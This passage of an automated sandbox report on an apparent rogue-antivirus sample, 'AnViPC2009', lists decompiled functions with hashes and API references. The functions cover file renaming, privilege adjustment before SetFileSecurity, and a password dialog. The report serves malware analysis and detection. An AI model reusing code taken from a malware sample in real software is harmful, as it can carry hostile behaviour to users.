                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                                                                  • String ID: (%A$0
                                                                                                                                                  • API String ID: 1693014935-102169129
                                                                                                                                                  • Opcode ID: b2e9a1e5582e37f7e6eb68226a8fb8fef6e9efa7671efadf11aee8d60acbb0af
                                                                                                                                                  • Instruction ID: cf071cc3fa9d71f7334cf3661a386cb64a2fa6f4ae35defbaf1d69bb54971268
                                                                                                                                                  • Opcode Fuzzy Hash: b2e9a1e5582e37f7e6eb68226a8fb8fef6e9efa7671efadf11aee8d60acbb0af
                                                                                                                                                  • Instruction Fuzzy Hash: 72F0B6B1D11218ABDB019FD9D9445DEFBF8FF59304F10805BE500B7250C7B816158FA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040AC7A(signed int _a4) {
                                                                                                                                                  				signed int _t4;
                                                                                                                                                  				signed int _t10;
                                                                                                                                                  				struct HDC__* _t13;
                                                                                                                                                  
                                                                                                                                                  				if( *0x41f318 == 0) {
                                                                                                                                                  					_t13 = GetDC(0);
                                                                                                                                                  					if(_t13 != 0) {
                                                                                                                                                  						 *0x41f318 = GetDeviceCaps(_t13, 0x58);
                                                                                                                                                  						ReleaseDC(0, _t13);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t4 =  *0x41f318; // 0x60
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t10 = 0x60;
                                                                                                                                                  				return _t4 * _a4 / _t10;
                                                                                                                                                  			}






                                                                                                                                                  0x0040ac81
                                                                                                                                                  0x0040ac8c
                                                                                                                                                  0x0040ac90
                                                                                                                                                  0x0040ac9e
                                                                                                                                                  0x0040aca3
                                                                                                                                                  0x0040aca3
                                                                                                                                                  0x0040aca9
                                                                                                                                                  0x0040acaa
                                                                                                                                                  0x0040acb6
                                                                                                                                                  0x0040acb7
                                                                                                                                                  0x0040acba

                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040AC86
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040AC95
                                                                                                                                                  • ReleaseDC.USER32 ref: 0040ACA3
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\Desktop\Endermanch@AnViPC2009.exe, xrefs: 0040AC83
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                  • API String ID: 127614599-27879111
                                                                                                                                                  • Opcode ID: 3c746edb9f9f92353186b46facc40910de06bd69763ea3c9d2de41071d68adb9
                                                                                                                                                  • Instruction ID: 63da3f036025e0b802933281b33f18f86a820d418aeccf2ba8fa70387ff53a06
                                                                                                                                                  • Opcode Fuzzy Hash: 3c746edb9f9f92353186b46facc40910de06bd69763ea3c9d2de41071d68adb9
                                                                                                                                                  • Instruction Fuzzy Hash: 47E01A36549714ABE310DB11EE4AB877A64AB25B12F018036FB01AA1E0C7B94464CBED
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E00404B10(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				char _v2052;
                                                                                                                                                  				char _v5156;
                                                                                                                                                  				char _v6212;
                                                                                                                                                  				char _v9412;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				int _t57;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  
                                                                                                                                                  				E00401200(0x24c0);
                                                                                                                                                  				_t70 =  &_v9412;
                                                                                                                                                  				E00403517( &_v9412);
                                                                                                                                                  				_t77 = _a4;
                                                                                                                                                  				_t68 = 0;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				if(E00406007( &_v9412, __edx, _a4, _a8,  &_v9412) == 0 || _v9412 == 0 || _v6212 == 0 || E0040DAE4(E004073B4( &_v9412),  &_v6212) == 0) {
                                                                                                                                                  					L15:
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t38 = E0040DAE4(E004073B4(_t77),  &_v6212);
                                                                                                                                                  					_t86 = _t38;
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					while(1) {
                                                                                                                                                  						E0040DBC0( &_v1028, _t77, 0x400);
                                                                                                                                                  						E0040A5E9(_t70, E004073B4( &_v1028), "rtmp%d", _t68);
                                                                                                                                                  						_t80 = _t80 + 0xc;
                                                                                                                                                  						if(E0040572E(_t86,  &_v1028, 0) == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t68 = _t68 + 0x7b;
                                                                                                                                                  						_t88 = _t68 - 0x2710;
                                                                                                                                                  						if(_t68 < 0x2710) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					if(E0040572E(_t88,  &_v1028, 0) != 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					E0040DBC0( &_v2052, _t77, 0x400);
                                                                                                                                                  					_t51 = E004073B4( &_v9412);
                                                                                                                                                  					E0040A450(E004073B4( &_v2052), _t51);
                                                                                                                                                  					_t57 = MoveFileA( &_v2052,  &_v1028);
                                                                                                                                                  					_t90 = _t57;
                                                                                                                                                  					if(_t57 == 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					E00404E8A( &_v5156);
                                                                                                                                                  					_t69 = 0;
                                                                                                                                                  					if(E0040572E(_t90, _t77, 0) == 0) {
                                                                                                                                                  						_t69 = E0040519F( &_v5156, _t77, 0, 1);
                                                                                                                                                  					}
                                                                                                                                                  					MoveFileA( &_v1028,  &_v2052);
                                                                                                                                                  					if(_t69 != 0) {
                                                                                                                                                  						E00404EF5( &_v5156);
                                                                                                                                                  						E00404F73( &_v5156);
                                                                                                                                                  					}
                                                                                                                                                  					E0040503B(_t69,  &_v5156);
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  			}















                                                                                                                                                  0x00404b18
                                                                                                                                                  0x00404b20
                                                                                                                                                  0x00404b26
                                                                                                                                                  0x00404b2b
                                                                                                                                                  0x00404b2e
                                                                                                                                                  0x00404b30
                                                                                                                                                  0x00404b43
                                                                                                                                                  0x00404ca9
                                                                                                                                                  0x00404ca9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404b82
                                                                                                                                                  0x00404b90
                                                                                                                                                  0x00404b95
                                                                                                                                                  0x00404b97
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404ba2
                                                                                                                                                  0x00404bab
                                                                                                                                                  0x00404bc3
                                                                                                                                                  0x00404bc8
                                                                                                                                                  0x00404bdb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404bdd
                                                                                                                                                  0x00404be0
                                                                                                                                                  0x00404be6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404be6
                                                                                                                                                  0x00404bf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c07
                                                                                                                                                  0x00404c13
                                                                                                                                                  0x00404c26
                                                                                                                                                  0x00404c3f
                                                                                                                                                  0x00404c41
                                                                                                                                                  0x00404c43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c4b
                                                                                                                                                  0x00404c53
                                                                                                                                                  0x00404c5c
                                                                                                                                                  0x00404c6e
                                                                                                                                                  0x00404c6e
                                                                                                                                                  0x00404c7e
                                                                                                                                                  0x00404c82
                                                                                                                                                  0x00404c8a
                                                                                                                                                  0x00404c95
                                                                                                                                                  0x00404c95
                                                                                                                                                  0x00404ca0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404ca5

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040DAE4: CompareStringA.KERNEL32(00000400,00001001,0040BA7B,000000FF,?,000000FF,0040BA7B,?,STATIC), ref: 0040DAFA
                                                                                                                                                    • Part of subcall function 0040A5E9: wvsprintfA.USER32 ref: 0040A5FC
                                                                                                                                                    • Part of subcall function 0040572E: GetFileAttributesW.KERNEL32(?,00404CD9,00000045,?,?,?,?), ref: 00405746
                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00404C3F
                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00404C7E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Move$AttributesCompareStringwvsprintf
                                                                                                                                                  • String ID: rtmp%d
                                                                                                                                                  • API String ID: 1782884900-3303766350
                                                                                                                                                  • Opcode ID: 1cbd80d99daa1404a2d8eff1a901c50babaa5db9882dbe09bf1e01a52a40875f
                                                                                                                                                  • Instruction ID: 1b9ecc460017d4d072db3072db9ce213105e6f11f926c4709b6f9220371b689f
                                                                                                                                                  • Opcode Fuzzy Hash: 1cbd80d99daa1404a2d8eff1a901c50babaa5db9882dbe09bf1e01a52a40875f
                                                                                                                                                  • Instruction Fuzzy Hash: CE4122F680511865DF20E6A18C45FEB73BCAF4534CF0504BBBB04B71C2DA3DAA498E68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E00403746(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, WCHAR* _a12) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  
                                                                                                                                                  				_t13 = E00406E67();
                                                                                                                                                  				if(_t13 == 0) {
                                                                                                                                                  					return _t13;
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = _a4;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t15 = E004024CD(_a4, __edx,  &_v16, 0);
                                                                                                                                                  				if(_t15 != 0) {
                                                                                                                                                  					E0040346B();
                                                                                                                                                  					_t17 = 7;
                                                                                                                                                  					_t38 =  *0x41486d; // 0x0
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						_t17 = 0xf;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_v16);
                                                                                                                                                  					_push(_t17);
                                                                                                                                                  					if(_a12 == 0) {
                                                                                                                                                  						_t15 = SetFileSecurityA(_a8, ??, ??);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = SetFileSecurityW(_a12, ??, ??);
                                                                                                                                                  					}
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						E00402C51(E0040B282(_t29 + 0x17, E004098D0(0x3e4), _a8));
                                                                                                                                                  						_t15 = E0040321D(0x414c7c, 1);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                  					_t15 = E0040A1DE(_v16);
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}










                                                                                                                                                  0x0040374c
                                                                                                                                                  0x00403753
                                                                                                                                                  0x004037ec
                                                                                                                                                  0x004037ec
                                                                                                                                                  0x0040375b
                                                                                                                                                  0x00403767
                                                                                                                                                  0x0040376a
                                                                                                                                                  0x0040376d
                                                                                                                                                  0x00403770
                                                                                                                                                  0x00403777
                                                                                                                                                  0x00403779
                                                                                                                                                  0x00403780
                                                                                                                                                  0x00403781
                                                                                                                                                  0x00403787
                                                                                                                                                  0x0040378b
                                                                                                                                                  0x0040378b
                                                                                                                                                  0x0040378c
                                                                                                                                                  0x0040378f
                                                                                                                                                  0x00403793
                                                                                                                                                  0x004037a3
                                                                                                                                                  0x00403795
                                                                                                                                                  0x00403798
                                                                                                                                                  0x00403798
                                                                                                                                                  0x004037ab
                                                                                                                                                  0x004037ce
                                                                                                                                                  0x004037d7
                                                                                                                                                  0x004037d7
                                                                                                                                                  0x004037ab
                                                                                                                                                  0x004037df
                                                                                                                                                  0x004037e4
                                                                                                                                                  0x004037e4
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                    • Part of subcall function 0040346B: GetCurrentProcess.KERNEL32(00000020,?,00000000,0040377E,?,00000000,?,?), ref: 0040348D
                                                                                                                                                    • Part of subcall function 0040346B: OpenProcessToken.ADVAPI32(00000000), ref: 00403494
                                                                                                                                                    • Part of subcall function 0040346B: LookupPrivilegeValueA.ADVAPI32 ref: 004034BE
                                                                                                                                                    • Part of subcall function 0040346B: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004034D5
                                                                                                                                                    • Part of subcall function 0040346B: GetLastError.KERNEL32 ref: 004034DB
                                                                                                                                                    • Part of subcall function 0040346B: LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 004034F6
                                                                                                                                                    • Part of subcall function 0040346B: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403507
                                                                                                                                                    • Part of subcall function 0040346B: CloseHandle.KERNEL32(?), ref: 0040350C
                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?), ref: 00403798
                                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 004037A3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Token$AdjustFileLookupPrivilegePrivilegesProcessSecurityValue$CloseCurrentErrorHandleLastOpenVersion
                                                                                                                                                  • String ID: |LA
                                                                                                                                                  • API String ID: 4147173873-4290591017
                                                                                                                                                  • Opcode ID: 2f3935b15ce0c6d73ba49c4bf65e523c3259b44d2efd6eb3383029117e584d5c
                                                                                                                                                  • Instruction ID: 355c1649bab0bb0e583114448a6b1cef199babb298150b7077b23b9de284e497
                                                                                                                                                  • Opcode Fuzzy Hash: 2f3935b15ce0c6d73ba49c4bf65e523c3259b44d2efd6eb3383029117e584d5c
                                                                                                                                                  • Instruction Fuzzy Hash: D1119EB2900219BBCF017FA59C8199E7F68AB04309F00C47BF905BB2C2C77D8B519B99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                  			E00402C52(intOrPtr _a4, long _a8, int* _a12, intOrPtr _a16) {
                                                                                                                                                  				struct HWND__* _t9;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				struct HWND__* _t17;
                                                                                                                                                  				int* _t18;
                                                                                                                                                  
                                                                                                                                                  				if( *0x41a792 == 0) {
                                                                                                                                                  					__eflags = _a4 - 2;
                                                                                                                                                  					_t9 =  *0x419f80; // 0x0
                                                                                                                                                  					_t17 = _t9;
                                                                                                                                                  					if(_a4 == 2) {
                                                                                                                                                  						_t15 = IsWindowVisible(_t9);
                                                                                                                                                  						__eflags = _t15;
                                                                                                                                                  						if(_t15 == 0) {
                                                                                                                                                  							_t17 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *0x419ee8; // 0x0
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						L9:
                                                                                                                                                  						_t18 = _a12;
                                                                                                                                                  						E0040A450(_t18, 0x419ee8);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = DialogBoxParamA( *0x414c74, "GETPASSWORD1", _t17, E0040B1EC, _a8);
                                                                                                                                                  						__eflags = _t14;
                                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                                  							goto L9;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t18 = _a12;
                                                                                                                                                  							 *_t18 = 0;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *_t18;
                                                                                                                                                  					if( *_t18 != 0) {
                                                                                                                                                  						_push(0x80);
                                                                                                                                                  						_push(_t18);
                                                                                                                                                  						_push(0x41a792);
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_a16);
                                                                                                                                                  					_t18 = _a12;
                                                                                                                                                  					_push(0x41a792);
                                                                                                                                                  					_push(_t18);
                                                                                                                                                  					L12:
                                                                                                                                                  					E0040A484();
                                                                                                                                                  				}
                                                                                                                                                  				return 0 |  *_t18 != 0x00000000;
                                                                                                                                                  			}








                                                                                                                                                  0x0040bc40
                                                                                                                                                  0x0040bc50
                                                                                                                                                  0x0040bc54
                                                                                                                                                  0x0040bc59
                                                                                                                                                  0x0040bc5b
                                                                                                                                                  0x0040bc5e
                                                                                                                                                  0x0040bc64
                                                                                                                                                  0x0040bc66
                                                                                                                                                  0x0040bc68
                                                                                                                                                  0x0040bc68
                                                                                                                                                  0x0040bc68
                                                                                                                                                  0x0040bc66
                                                                                                                                                  0x0040bc6a
                                                                                                                                                  0x0040bc70
                                                                                                                                                  0x0040bca1
                                                                                                                                                  0x0040bca1
                                                                                                                                                  0x0040bcaa
                                                                                                                                                  0x0040bc72
                                                                                                                                                  0x0040bc86
                                                                                                                                                  0x0040bc8c
                                                                                                                                                  0x0040bc8e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc90
                                                                                                                                                  0x0040bc90
                                                                                                                                                  0x0040bc93
                                                                                                                                                  0x0040bc95
                                                                                                                                                  0x0040bc95
                                                                                                                                                  0x0040bc8e
                                                                                                                                                  0x0040bcaf
                                                                                                                                                  0x0040bcb1
                                                                                                                                                  0x0040bcb3
                                                                                                                                                  0x0040bcb8
                                                                                                                                                  0x0040bcb9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcb9
                                                                                                                                                  0x0040bc42
                                                                                                                                                  0x0040bc42
                                                                                                                                                  0x0040bc45
                                                                                                                                                  0x0040bc48
                                                                                                                                                  0x0040bc4d
                                                                                                                                                  0x0040bcbe
                                                                                                                                                  0x0040bcbe
                                                                                                                                                  0x0040bcbe
                                                                                                                                                  0x0040bccd

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogParamVisibleWindow
                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                  • API String ID: 3157717868-3292211884
                                                                                                                                                  • Opcode ID: 319404afec191ab303e6cbde0849cd7afbbf84ff66a978a53748cd3c03a14d26
                                                                                                                                                  • Instruction ID: 19e5e80469afbb98079fb6f772f9c71b75358f1e78d2d2fb07fd4d161fcb281a
                                                                                                                                                  • Opcode Fuzzy Hash: 319404afec191ab303e6cbde0849cd7afbbf84ff66a978a53748cd3c03a14d26
                                                                                                                                                  • Instruction Fuzzy Hash: 0A01C2312493557BEB229F209D45AD73B54EA11714B14843FF840732D1DB789D9093DE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%